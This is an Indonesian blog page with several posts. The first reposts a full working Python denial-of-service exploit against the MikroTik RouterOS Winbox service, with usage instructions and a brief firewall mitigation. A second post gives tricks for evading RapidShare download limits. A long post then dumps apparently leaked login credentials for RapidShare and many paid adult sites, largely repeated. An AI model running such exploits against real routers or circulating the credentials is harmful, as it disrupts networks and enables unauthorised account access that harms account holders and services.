Tampilkan postingan dengan label Rapidshare. Crack. Tampilkan semua postingan
Tampilkan postingan dengan label Rapidshare. Crack. Tampilkan semua postingan

Sabtu, 05 Mei 2012

attack DoS Mikrotik RouterOS 2.9.6 - 5.15

Script Python : from http://www.133tsec.com/2012/04/30/0day-ddos-mikrotik-server-side-ddos-attack/

http://www.exploit-db.com/exploits/18817/



#!/usr/bin/python
# Exploit Title:    Mikrotik Router Remote Denial Of Service attack
# Date:             19/4/2012
# Author:           PoURaN @ 133tsec.com
# Software Link:    http://www.mikrotik.com
# Version:          All mikrotik routers with winbox service enabled are affected (still a 0day 30/5/2012)
# Tested on:        Mikrotis RouterOS 2.9.6 up to 5.15
#
#  Vulnerability Description
# ===========================
# DETAILS & PoC VIDEO : http://www.133tsec.com/2012/04/30/0day-ddos-mikrotik-server-side-ddos-attack/
# The denial of service, happens on mikrotik router's winbox service when
# the attacker is requesting continuesly a part of a .dll/plugin file, so the service
# becomes unstable causing every remote clients (with winbox) to disconnect
# and denies to accept any further connections. That happens for about 5 minutes. After
# the 5 minutes, winbox is stable again, being able to accept new connections.
# If you send the malicious packet in a loop (requesting  part of a file right after
# the service becoming available again) then you result in a 100% denial of winbox service.
# While the winbox service is unstable and in a denial to serve state, it raises router's CPU 100%
# and other actions. The "other actions" depends on the router version and on the hardware.
# For example on Mikrotik Router v3.30 there was a LAN corruption, BGP fail, whole router failure
#   => Mikrotik Router v2.9.6 there was a BGP failure
#   => Mikrotik Router v4.13 unstable wifi links
#   => Mikrotik Router v5.14/5.15 rarely stacking
#   =>>> Behaviour may vary most times, but ALL will have CPU 100% . Most routers loose BGP after long time attack <<<=
#
#
#  The exploit
# =============
# This is a vulnerability in winbox service, exploiting the fact that winbox lets you download files/plugins
# that winbox client needs to control the server, and generally lets you gain basic infos about the service BEFORE
# user login!
# Sending requests specially crafted for the winbox service, can cause a 100% denial of winbox service (router side).
# This script, offers you the possibility to download any of the dlls that can be downloaded from the router one-by-one
# or alltogether! (look usage for more info) .. The file must be contained in the router's dll index.
# The dlls downloaded, are in the format of the winbox service.. Meaning that they are compressed with gzip and they
# have 0xFFFF bytes every 0x101 bytes (the format that winbox client is expecting the files)
# These DLLs can be used by the "Winbox remote code execution" exploit script ;)
#
#  Usage
# =======
# Use the script as described below:
# 1. You can download ALL the files of the router's dll index using the following command:
#   python mkDl.py 10.0.0.1 * 1
#   the "1" in the end, is the speed.. "Speed" is a factor I added, so the script delays a bit while receiving
#   information from the server. It is a MUST for remote routers when they are in long distance (many hops) to use
#   a slower speed ( 9 for example ).
#   Also in the beginning of the dlls file list, script shows you the router's version (provided by router's index)
# 2. You can download a specific .dll file from the remote router.
#   python mkDl.py 10.67.162.1 roteros.dll 1
#   In this example i download roteros.dll (which is the biggest and main plugin) with a speed factor of 1 (very fast)
#   Because roteros and 1-2 other files are big, you have to request them in different part (parts of 64k each)
#   That is a restriction of winbox communication protocol.
#   If you don't know which file to request, make a "*" request first (1st usage example), see the dlls list, and press ctrl-c
#   to stop the script.
# 3. You can cause a Denial Of Service to the remote router.. Means denial in winbox service or more (read above for more)
#   python mkDl.py 10.67.162.1 DoS
#   This command starts requesting from router's winbox service the 1st part of roteros.dll looping the request
#   and causing DoS to the router. The script is requesting the file till the router stops responding to the port (8291)
#   Then it waits till the service is up again (using some exception handling), then it requests again till the remote
#   service is down again etc etc... The requests lasts for about 2 seconds, and the router is not responding for about
#   5 minutes as far as i have seen from my tests in different routeros versions.
#
#   <> Greetz to mbarb, dennis, andreas, awmn and all mighty researchers out there! keep walking guys <>
#
import socket, sys, os, struct, random, time
 
def InitConnection(mikrotikIP, speed):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((mikrotikIP, 8291))
    s.send(winboxStartingIndex)
    data = s.recv(1024)         # receiving dll index from server
    time.sleep(0.001*speed)
    if data.find("\xFF\x02"+"index"+"\x00") > -1:
        print "[+] Index received!"
    else:
        print "[+] Wrong index.. Exiting.."
        sys.exit(0)
    return s
 
def download(filename, speed, s):
    f = open(filename, 'wb')
    if len(filename) < 13 and len(filename) > 6:
        print "[+] Requesting file ", filename, ' <->'
        winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter
        s.send(winboxStartingFileReq)
        time.sleep(0.001*speed)
        dataReceived = s.recv(1)
        if dataReceived[0:1]=='\xFF':
            print "[+] Receiving the file..."
            f.write(dataReceived)                       # written 1st byte
            time.sleep(0.001*speed)
            dataReceived = s.recv(0x101)                # 0x100 + 1
            nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0]
            if dataReceived[0:1]=='\x02':
                time.sleep(0.001*speed)
                f.write(dataReceived)                   # written 1st chunk 0x102 bytes with header in file.
                dataReceived = s.recv(0x102)            # 1st sequence of (0xFF 0xFF)
                bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2
                f.write(dataReceived)                   # write the next 0x102 bytes (total 0x102+0x102 in file)
            else:
                print "[-] Wrong data received..(2)"
                sys.exit(0)
        else:
            print "[-] Wrong data received..(1)"
            sys.exit(0)
         
        finalPart=0
        bigFileCounter = 0xFFED
        packetsCounted=0        # counter for the 0x101 packet counts. Every time a file is requested this counter is 0
        fileRequested=0         # every time a file needs to be requested more than 1 time, this is it's counter.
        while 1:                                # header of file done.. Now LOOP the body..
            packetsCounted+=1   # dbg
            time.sleep(0.001*speed)
            dataReceived = s.recv(bytesToRead)
            f.write(dataReceived)
            if (bytesToRead <> len(dataReceived)) and packetsCounted==255:    # an den diavazei osa bytesToRead prepei, simainei oti eftase sto telos i lipsi tou part pou katevazoume
                packetsCounted = -1
                print '[+] Next file part : ', fileRequested
                s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) +  struct.pack('>h',bigFileCounter))
                time.sleep(0.001*speed)
                dataReceived = s.recv(0x101 + 2)            # Reads the new header of the new part!!!
                nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0]
                f.write(dataReceived)
                bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16)
                fileRequested += 1
                bigFileCounter -= 0x13
            bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16)      # den prostheto 2 tora giati to teleutaio den einai ff.. einai akrivos to size pou paramenei..
            if bytesToRead==0xFF:           # kalipto tin periptosi opou to teleutaio struct den einai ff alla exei to size pou apomenei
                bytesToRead += 2
            if bytesToRead != 0x101 and nextPartFingerprint < 65517: # dikaiologountai ta liga bytes otan teleiose ena apo ta parts tou file
                time.sleep(0.001*speed)
                dataReceived = s.recv(bytesToRead)
                f.write(dataReceived)
                break
            if bytesToRead != 0x101 and nextPartFingerprint==65517:     # ligotera bytes KAI fingerprint 65517 simainei corrupted file..
                print '[-] File download terminated abnormaly.. please try again probably with a slower speed..'
                sys.exit(0)
        if fileRequested < 1:    print '[+] File was small and was downloaded in one part\n[+] Downloaded successfully'
        else:   print '[+] File '+filename+' downloaded successfully'
    f.close()
    s.close()
 
     
def Flood(s):
    filename = 'roteros.dll'
    f = 'we\'r not gonna use I/O to store the data'
    print "[+] Requesting file ", filename, ' till death :)'
    time.sleep(1)
    winboxStartingFileReq = RequestHeader + filename.ljust(12, '\x00') + RequestFirstFooter
    s.send(winboxStartingFileReq)
    time.sleep(0.001)
    dataReceived = s.recv(1)
    if dataReceived[0:1]=='\xFF':
        f = dataReceived                        # written 1st byte
        time.sleep(0.001)
        dataReceived = s.recv(0x101)                # 0x100 + 1
        nextPartFingerprint = struct.unpack('>H', dataReceived[14:16])[0]
        if dataReceived[0:1]=='\x02':
            time.sleep(0.001)
            f = dataReceived                    # written 1st chunk 0x102 bytes with header in file.
            dataReceived = s.recv(0x102)            # 1st sequence of (0xFF 0xFF)
            bytesToRead = int(dataReceived[len(dataReceived)-2].encode('hex'), 16) + 2
            f = dataReceived                    # write the next 0x102 bytes (total 0x102+0x102 in file)
        else:
            print "[-] Wrong data received..(2)"
            sys.exit(0)
    else:
        print "[-] Wrong data received..(1)"
        sys.exit(0)
     
    finalPart=0
    bigFileCounter = 0xFFED
    packetsCounted=0        # counter for the 0x101 packet counts. Every time a file is requested this counter is 0
    fileRequested=0         # every time a file needs to be requested more than 1 time, this is it's counter.
    try:
        while 1:
            s.send(RequestHeader + filename.ljust(12, '\x00') + '\xFF\xED\x00' + struct.pack('=b',fileRequested) +  struct.pack('>h',bigFileCounter))
            s.recv(1)
            print '- Sending evil packet.. press CTRL-C to stop -'
    except:
        print 'Connection reseted by server.. trying attacking again'
 
 
###############################################################################################################
########################################### SCRIPT BODY STARTS HERE ###########################################
global RequestHeader
RequestHeader = ('\x12\x02')
global RequestFirstFooter
RequestFirstFooter = ('\xFF\xED\x00\x00\x00\x00')
 
global winboxStartingIndex
winboxStartingIndex=(RequestHeader + 'index' + '\x00'*7 + RequestFirstFooter)
winboxStartingFileReq=(RequestHeader + '\x00'*12 + RequestFirstFooter)
 
print '\n[Winbox plugin downloader]\n\n'
 
if len(sys.argv)==3:
    if sys.argv[2]=='DoS':                          # if i combine both checks in 1st if, there will be error.. guess why.. ;)
        print '[+] Hmmm we gonna attack it..'
        time.sleep(1)
        speed=1
        mikrotikIP = sys.argv[1]
        filename = sys.argv[2]
        while 1:
            time.sleep(1)
            try:
                s = InitConnection(mikrotikIP, speed)
                Flood(s)
            except:
                time.sleep(1)
 
if len(sys.argv)<>4:
    print 'Usage : '+sys.argv[0]+' \n\t:\t [from 0 to 9] 1=faster, 9=slower but more reliable\n'
    sys.exit(0)
 
mikrotikIP = sys.argv[1]
filename = sys.argv[2]
speed = int(sys.argv[3])
if speed>9 or speed<1:
    print 'Speed must be between 1 and 9 else there are unexpected results!'
    sys.exit(0)
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((mikrotikIP, 8291))
s.send(winboxStartingIndex)
data = s.recv(1024)         # receiving dll index from server
s.close()
 
if filename.find('*') > -1:
    DllList = data.split('\x0a')
    print 'Mikrotik\'s version is '+DllList[1].split(' ')[3]+'\nThe following Dlls gonna be requested :'
    for i in range(0, len(DllList)-1):
        print DllList[i].split(' ')[2]
    raw_input('> Press enter to continue <')
    for extractedDlls in range(0, len(DllList)-1):
        print "[+] Requesting ", DllList[extractedDlls].split(' ')[2]
        filename=DllList[extractedDlls].split(' ')[2]
        s = InitConnection(mikrotikIP, speed)
        download(filename, speed, s)
else:
    s = InitConnection(mikrotikIP, speed)
    download(filename, speed, s)


 

---------

howto used:  #python mikrotikdos.py dos
 

------


How to protected :


1. change port 8921 (winbox) to others port (ex: 8999)
2. make script protected firewall, ex:


add action=add-src-to-address-list address-list=DDOS address-list-timeout=15s \
chain=input disabled=no dst-port=1337 protocol=tcp
add action=add-src-to-address-list address-list=DDOS address-list-timeout=15m \
chain=input disabled=no dst-port=7331 protocol=tcp src-address-list=knock
add action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w chain=input comment=”Port scanners to list ” \
disabled=no protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w chain=input comment=”SYN/FIN scan” disabled=no \
protocol=tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w chain=input comment=”SYN/RST scan” disabled=no \
protocol=tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w chain=input comment=”FIN/PSH/URG scan” disabled=\
no protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w chain=input comment=”ALL/ALL scan” disabled=no \
protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=”port scanners” \
address-list-timeout=2w chain=input comment=”NMAP NULL scan” disabled=no \
protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg





Minggu, 15 Februari 2009

Rapidshare Hacking

There are two hacks to beat Rapidshare download limits and waiting time.

1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment. 
But most of the time, that advantage is available only to people with the programming skills to make the changes they want. 

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools. 
It changes how Web pages look and act by altering the rendering process. 

http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox 
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script". 
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in. 
Open it, wait a couple seconds for the install button becomes active. 
7) Click on it to install this plug-in then CLOSE FIREFOX. 
8) Run FireFox again. 
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'. 
9) Open it. 
10) Click the Tools Menu then click on Install User Script then click OK. 
11) Close FireFox. 

The script will let you enjoy "no wait" and multiple file downloads......! 


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. 
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the JavaScript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. 
Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. 
If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

C] Use a proxy with SwitchProxy and Firefox:
1) Download and install Firefox
2) Download and install SwitchProxy
3) Google for free proxies
4) When you hit your download limit, clean your cookies and change your proxy

D] You can use a bookmarklet to stop your wait times:
1) Open IE
2) Right Click On This Link
3) Select Add to Favorites
4) Select Yes to the warning that the bookmark may be unsafe.
5) Name it “RapidShare No Wait”
6) Click on the Links folder (if you want to display it in your IE toolbar)
7) Click OK
8) You may need to close and reopen IE to see it
9) Goto rapidshare and click the bookmarklet when you are forced to wait

Thanks kev

Selasa, 15 April 2008

Crack Rapidshare +plus

#-------------------------------------------------------
B O N U S / F R E E = 4 my Friend
#-------------------------------------------------------

intitle:rapidshare intext:login

LOGIN: 36274 PASSWORD: 2961920

LOGIN: 23290
PASSWORD: 8765578


Quote:
LOGIN: 30439
PASSWORD: 1117289

Rapidshare login accounts


Quote:
LOGIN: 45575
PASSWORD: 2573305


Quote:
LOGIN: 46042
PASSWORD: 8271283


Quote:
LOGIN: 46044
PASSWORD: 3494441


Quote:
LOGIN: 46051
PASSWORD: 3345449


Quote:
LOGIN: 46055
PASSWORD: 5103287


Quote:
LOGIN: 50415
PASSWORD: 5950137

Quote:
LOGIN: 50419
PASSWORD: 2643224

here is more passwords

LOGIN: 40586
PASSWORD: 4181392

Account-ID: 36713
Password: 8785993

LOGIN: 34746
PASSWORD: 7861243

LOGIN: 34978
PASSWORD: 6943382

LOGIN: 34979
PASSWORD: 3194204

LOGIN: 34980
PASSWORD: 7812184

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 15156
Password: 2679943

LOGIN: 18549
Password: 4646182

LOGIN: 19365
PASSWORD: 9667651

LOGIN: 18800
PASSWORD: 9496722

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 36272
PASSWORD: 8961973

LOGIN: 36273
PASSWORD: 8061013

LOGIN: 36274
PASSWORD: 2961920

LOGIN: 36275
PASSWORD: 8018801

LOGIN: 36276
PASSWORD: 527330

LOGIN: 34976
PASSWORD: 6650188

Account-ID: 36712
Password: 1877564

LOGIN: 34746
PASSWORD: 7861243

LOGIN: 34978
PASSWORD: 6943382

LOGIN: 34979
PASSWORD: 3194204

LOGIN: 34980
PASSWORD: 7812184

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 15156
Password: 2679943

LOGIN: 18549
Password: 4646182

LOGIN: 19365
PASSWORD: 9667651

LOGIN: 18800
PASSWORD: 9496722

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 36272
PASSWORD: 8961973

LOGIN: 36273
PASSWORD: 8061013

LOGIN: 36274
PASSWORD: 2961920

LOGIN: 36275
PASSWORD: 8018801

LOGIN: 36276
PASSWORD: 527330

LOGIN: 34976
PASSWORD: 6650188

LOGIN: 34978
PASSWORD: 6943382

LOGIN: 34979
PASSWORD: 3194204

LOGIN: 34980
PASSWORD: 7812184


Account-ID: 36713
Password: 8785993


LOGIN: 36272
PASSWORD: 8961973


LOGIN: 36274
PASSWORD: 2961920

LOGIN: 36275
PASSWORD: 8018801

LOGIN: 36276
PASSWORD: 527330

LOGIN: 34976
PASSWORD: 6650188

LOGIN: 34978
PASSWORD: 6943382



Account-ID: 22834
Password: 9814819


Account-ID: 47191 Password: 4690422
Account-ID: 47189 Password: 2878020
Account-ID: 48004 Password: 6866946
Account-ID: 48006 Password: 4844644
Account-ID: 48008 Password: 2515888
Account-ID: 36716 Password: 7634111
Account-ID: 45100 Password: 4430955
Account-ID: 47191 Password: 4690422
Account-ID: 47189 Password: 2878020
Account-ID: 48004 Password: 6866946
Account-ID: 48006 Password: 4844644
Account-ID: 48008 Password: 2515888


Quote:
LOGIN: 23290
PASSWORD: 8765578


Quote:
LOGIN: 30439
PASSWORD: 1117289

Rapidshare login accounts


Quote:
LOGIN: 45575
PASSWORD: 2573305


Quote:
LOGIN: 46042
PASSWORD: 8271283


Quote:
LOGIN: 46044
PASSWORD: 3494441


Quote:
LOGIN: 46051
PASSWORD: 3345449


Quote:
LOGIN: 46055
PASSWORD: 5103287


Quote:
LOGIN: 50415
PASSWORD: 5950137


Quote:
LOGIN: 50419
PASSWORD: 2643224


here is more passwords


LOGIN: 40586
PASSWORD: 4181392

Account-ID: 36713
Password: 8785993

LOGIN: 34746
PASSWORD: 7861243

LOGIN: 34978
PASSWORD: 6943382

LOGIN: 34979
PASSWORD: 3194204

LOGIN: 34980
PASSWORD: 7812184

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 15156
Password: 2679943

LOGIN: 18549
Password: 4646182

LOGIN: 19365
PASSWORD: 9667651

LOGIN: 18800
PASSWORD: 9496722

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 36272
PASSWORD: 8961973

LOGIN: 36273
PASSWORD: 8061013

LOGIN: 36274
PASSWORD: 2961920

LOGIN: 36275
PASSWORD: 8018801

LOGIN: 36276
PASSWORD: 527330

LOGIN: 34976
PASSWORD: 6650188

Account-ID: 36712
Password: 1877564

LOGIN: 34746
PASSWORD: 7861243

LOGIN: 34978
PASSWORD: 6943382

LOGIN: 34979
PASSWORD: 3194204

LOGIN: 34980
PASSWORD: 7812184

Login: 20145
Password: 7072148

Login: 19159
Password: 7932964

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 15156
Password: 2679943

LOGIN: 18549
Password: 4646182

LOGIN: 19365
PASSWORD: 9667651

LOGIN: 18800
PASSWORD: 9496722

LOGIN: 20949
PASSWORD: 2716739

LOGIN: 36272
PASSWORD: 8961973

LOGIN: 36273
PASSWORD: 8061013

LOGIN: 36274
PASSWORD: 2961920

LOGIN: 36275
PASSWORD: 8018801

LOGIN: 36276
PASSWORD: 527330

LOGIN: 34976
PASSWORD: 6650188

LOGIN: 34978
PASSWORD: 6943382

LOGIN: 34979
PASSWORD: 3194204

LOGIN: 34980
PASSWORD: 7812184


Account-ID: 36713
Password: 8785993


LOGIN: 36272
PASSWORD: 8961973


LOGIN: 36274
PASSWORD: 2961920

LOGIN: 36275
PASSWORD: 8018801

LOGIN: 36276
PASSWORD: 527330

LOGIN: 34976
PASSWORD: 6650188

LOGIN: 34978
PASSWORD: 6943382


---------------


Account Members XXX
http://www.screamandcream.com/members/ Username: viacehaibiopa99 Password: soucliobacrea50
http://members.zenra.com (http://members.zenra.com/) Username : 9Vn7fX Password : 3uAmNt97
http://members.maturevslads.com (http://members.maturevslads.com/) Username : 7VZ6TL Password : YJUjRr
http://members.sexy-babes.tv (http://members.sexy-babes.tv/) Username: rjpe5wm2MS Password : VNYEw3TCEb
http://members.milfhunter.com (http://members.milfhunter.com/) USERNAME : kodiwq81 PASSWORD : demaqq26
Links to websites that are included in your membership :
http://members.mikeinbrazil.com/
http://members.eurosexparties.com/
http://members.streetblowjobs.com/
http://members.8thstreetlatinas.com/
http://members.roundandbrown.com/
http://members.milfnextdoor.com/
http://members.topshelfpussy.com/
http://members.bignaturals.com/
http://members.mrchewsasianbeaver.com (http://members.mrchewsasianbeaver.com/) Username: lorena_cordova@mac.com Password : fuck1234
http://member02.tokyo-hot.com/member/index.html Username : asapzone Password : fuck1234
http://www.actionjav.com/members/index.cfm usercode is : 46907780 passcode is : 9167553
http://members.asianxtv.deluxepass.com/ user : dpr63js8 pass : thoucle7
Zahra Amir Ebrahimi, http://www.womendiary.net/2006/11/13/zahra-amir-ebrahimi-and-her-sex-video-iranian-paris-hilton-wannabe/Account Members
http://www.screamandcream.com/members/ Username: viacehaibiopa99 Password: soucliobacrea50
http://members.zenra.com (http://members.zenra.com/) Username : 9Vn7fX Password : 3uAmNt97
http://members.maturevslads.com (http://members.maturevslads.com/) Username : 7VZ6TL Password : YJUjRr
http://members.sexy-babes.tv (http://members.sexy-babes.tv/) Username: rjpe5wm2MS Password : VNYEw3TCEb
http://members.milfhunter.com (http://members.milfhunter.com/) USERNAME : kodiwq81 PASSWORD : demaqq26
Links to websites that are included in your membership :
http://members.mikeinbrazil.com/
http://members.eurosexparties.com/
http://members.streetblowjobs.com/
http://members.8thstreetlatinas.com/
http://members.roundandbrown.com/
http://members.milfnextdoor.com/
http://members.topshelfpussy.com/
http://members.bignaturals.com/
http://members.mrchewsasianbeaver.com (http://members.mrchewsasianbeaver.com/) Username: lorena_cordova@mac.com Password : fuck1234
http://member02.tokyo-hot.com/member/index.html Username : asapzone Password : fuck1234
http://www.actionjav.com/members/index.cfm usercode is : 46907780 passcode is : 9167553
http://members.asianxtv.deluxepass.com/ user : dpr63js8 pass : thoucle7
http://www.screamandcream.com/members/ Username: viacehaibiopa99 Password: soucliobacrea50
http://members.zenra.com (http://members.zenra.com/) Username : 9Vn7fX Password : 3uAmNt97
http://members.maturevslads.com (http://members.maturevslads.com/) Username : 7VZ6TL Password : YJUjRr
http://members.sexy-babes.tv (http://members.sexy-babes.tv/) Username: rjpe5wm2MS Password : VNYEw3TCEb
http://members.milfhunter.com (http://members.milfhunter.com/) USERNAME : kodiwq81PASSWORD : demaqq26
http://members.mikeinbrazil.com/
http://members.eurosexparties.com/
http://members.streetblowjobs.com/
http://members.8thstreetlatinas.com/
http://members.roundandbrown.com/
http://members.milfnextdoor.com/
http://members.topshelfpussy.com/
http://members.bignaturals.com/
http://members.mrchewsasianbeaver.com (http://members.mrchewsasianbeaver.com/) Username: lorena_cordova@mac.com Password : fuck1234
http://member02.tokyo-hot.com/member/index.html Username : asapzone Password : fuck1234
http://www.actionjav.com/members/index.cfm usercode is : 46907780 passcode is : 9167553
http://members.asianxtv.deluxepass.com/ user : dpr63js8 pass : thoucle7
http://members.deluxepass.com (http://members.deluxepass.com/) Login: dpf2tj31 Password: xcf62bj
http://members.playtimevideo.com/secure/ Login: xdeath87 Password:slayer
http://members.interracialtv.com (http://members.interracialtv.com/) Login: SunShyne Password: Stimpy
http://jenniferwalcott.com/members/ Login: clticic Password:Tr2Amp25
http://allnaughtyhoes.com/members/ Login: sweet Password: sluts
http://gagvault.com/members/ Login: pmdmsctsk Password: pmdmsctsk
http://big-is-beautiful.net/members/ Login: eskimo Password: fuzzball
http://nastyxrated.com/members/ Login: gobierno Password: 74723006
http://www.pregnantlady.com/members/ Login: XxXmeanS Password: DaBest
http://members.whitepussyblackcocks.com/ Login: harry Password:666666
http://members.stephanieswift.com/swiftpass/ Login: test Password: password
http://www.sexylesbianvideos.com/members/index.html Login: johalhs Password: sohail
http://www.lesbiansorority.com/members/index.html Login: hottest Password: sex
http://www.toonfuck.com/private/index.html Login: broken Password: spiral
http://www.upskirtass.com/members Login: dowjones Password: stockman199
http://monstersofcock.bangbros.com/ Login: lanet32 Password: sosodef
http://members.taylorbow.com/protect/ Login: toshiaki1 Password: kawada1
http://members.guysluckyday.com/ Login: eyedoc2 Password: contacts
http://members.cheergirlsgallery.com (http://members.cheergirlsgallery.com/) Login: shadowon Password: shadow22
http://mikesapartmentonline.com/members/index.html Login: zonda Password: zonda
http://asian4you.com user id : susahbanget pass : akuberhasil
http://www.met-art.com username: kusbang password : nanaloli
http://shaunasand.com/members/ Login: pool6123 Password: care1839
http://pornstarhearts.com/members/ Login: amber Password: michaels
http://bigxxxplace.com/members/ Login: herstal Password: 2004to05
http://3porndvds.net/members/ Login: ynotretep Password: nibbinet
http://orgyheavenz.com/members/ Login: casey Password: ryback
http://cute2slut.com/members/ Login: miguel Password: ferrer
http://tickleworld.com/members/ Login: caddyboy Password: caddy044
http://www.ddgirls.com/members/ Login: jflores7299 Password: HPwramc04
http://members.oxpass.com/ Login: 40steve Password: movies
http://bangbrosworldwide.oxpassport.com/ Login: guanche Password: 00001742
http://members.bangbros.com Login: ecko215 Password: metho1
http://assparade.bangbros.com/ Login: jonno Password: novanova
http://members.videosz.com/ Login: vzk88zmt Password: tox6546
http://members.naughtyamericavip.com/members/ Login: 08sk05 Password: delta366
http://www.members.movieerotica.com Login: 00794014 Password: 9517883
http://assparade.bangbros.com/ Login: yardie Password: 123456
http://www.sexychristina.com/members/ Login: bintang Password: butterfl
http://www.amateursinside.com/members Login: jacob6 Password: archie3
http://www.priceless420.com/members/NewPics.htm Login: jamerson Password: kavasia
http://www.supermodeltits.com/secure/ Login: telly5 Password: 5telly
http://www.mpgpage.com/members/ Login: 63637 Password: 703751
http://bunnyglamazon.com/members/ Login: 75nova Password: 688nyq
http://nailedchicks.com/members/ Login: gloeffect Password: emuleadmin
http://irongoddessnicole.com/members/ Login: 123 Password: 123
http://pornstarhearts.com/members/ Login: amber Password: michaels
http://nastyxrated.com/members/ Login: gobierno Password: 74723006
http://spycamaddicts.com/members/ Login: verbatim Password: stille
http://exposedmilfs.net/members/ Login: michelle Password: mansion2
http://members.anabolicxxx.com/index.htm Login: rmanus Password: al2fred
http://fitdolls.com/members/mem_index.html?CLICK Login: mbhall77 Password: meggie
http://members.socalcoeds.com/members/ Login: mackman Password: yaya
http://clubnaughtyamerica.com/members/index.html Login: rjoes1 Password: rjoes2
http://mikesapartmentonline.com/members/index.html Login: oooooo Password: gerardo
http://members.wildlatinagirls.com Login: bigdsrigga Password: nickle
http://www.milena-velba.com/mem45xs3/ohayo.html Login: pietje01 Password: henkie01
http://dayana-cadeau.com/members/members_fr.html Login: Kiper Password: argo2233
http://girlcreations.com/members/ Login: Resys Password: exklusiv
http://216658:ypx089@members.homemademovies.deluxepass.co m/
http://215731:qfv854@members.homemademovies.deluxepass.co m/
http://discreet:sex@coedflashers.com/members/
http://wc18c2:l2g7k3@coedflashers.com/members/index.html
http://euro:money@coedflashers.com/members/
http://sendme:email@coedflashers.com/members/index.html
http://hacker:bandit@coedflashers.com/members/index.html
http://forxxxhq:birthday1@coedflashers.com/members/
http://raleigh:greenville@coedflashers.com/members/index.html
http://forxxxhq:birthday131@coedflashers.com/members/
http://marcellas:77886@coedflashers.com/members/index.html
http://ipilreif:caphcopa@members.bangbrosnetwork.com/
http://here89za:yellow@www.babylonxxx.com/members/
http://snake413:drill12@members.asiancream.com
http://Diver:Diver@members.asiancream.com
http://qwerty:ytrewq@www.asianvoltage.com/members/
http://luasnts3:inern@members.asiancream.com/
http://carroll:caradaptor@members.asiancream.com
http://vzr33ecp:cnf22pj@members.videosz.com/
http://B34TLES:isvip@members.adultvideonetwork.com
http://johnny1:isvipebaby@members.analcravings.com/
http://power10:viper9@members.bukkakehouse.com/main.html
http://dickie:blue@www.pornoplayhouse.com/live-vip/
http://Mcpherso:monkey@wt50.com/in.php?id=xNEJCx
http://7450749:supporte@wt50.com/in.php?id=xNEJCx
http://vixxen1:audio@wt50.com/in.php?id=xNEJCx
http://pacman:internet@wt50.com/in.php?id=xNEJCx
http://tang2370:28infern@www.illanalesa.com/members/mo-home.htm?CLICK=
http://bluefive:b68nxy@www.illanalesa.com//members/mo-home.htm
http://lexluthero:candyman@www.illanalesa.com/members/mo-home.htm
http://jdubi31:hoopstar@www.illanalesa.com//members/mo-home.htm
http://april16:polycom@www.illanalesa.com/members/mo-home.htm
http://Greer:holland@harmonyconcepts.com/www/front.htm
http://james.hollands%40ukonline.co.uk:kd5396b@hotlatinag irls.com/members/index.html
http://mkoedder:gt2000@members.oxpassport.com
http://xsquad98:atl1980@members.oxpass.com/
http://beezer:031054@members.oxpass.com
http://jacko74:oscar03@bangbus.oxpassport.com
http://17nelson:terminal@members.oxpass.com/
http://gab25:wowsers@members.oxpass.com/
http://tjh241:1313remy@members.oxpass.com/
http://tq1000:tqbgmo@members.oxpass.com
http://da:da@members.pbits.com
http://9jfnaaf8:4p9f8nja@members.pbits.com
http://drakon96:002159@www.interactive-cartoons.com/members/welcome.htm
http://lam6239:connor@www.interactive-cartoons.com/members/welcome.htm
